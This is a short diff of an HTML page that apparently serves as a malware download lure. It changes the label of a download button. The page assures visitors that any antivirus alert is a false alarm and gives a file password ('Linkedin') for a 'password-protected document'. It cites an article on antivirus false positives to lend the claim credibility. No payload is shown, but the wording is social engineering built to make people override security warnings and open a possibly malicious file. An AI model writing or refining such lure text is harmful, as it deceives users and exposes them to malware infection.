--- a/index.html
+++ b/index.html
@@ -1,7 +1,7 @@
 <p>
 <center>Your Antivirus software may show a false alert but never worry because it is an encrypted password-protected document.<br>
 </p>
-<center><h2>Unlock your download by entering the File Password<p></p>Then click on the "Download Protected File" to get instant access to your document!</h2>
+<center><h2>Unlock your download by entering the File Password<p></p>Then click on the "Download Secure File" to get instant access to your document!</h2>
 <div style="font-size:16pt; color:green;" align="center"><b>File Password: </b> Linkedin </b> </div>
 <a href="https://www.av-comparatives.org/dealing-with-false-positives-reporting-issues-to-antivirus-vendors/">Dealing with False Positives: Reporting Issues to Antivirus Vendors</a>
 
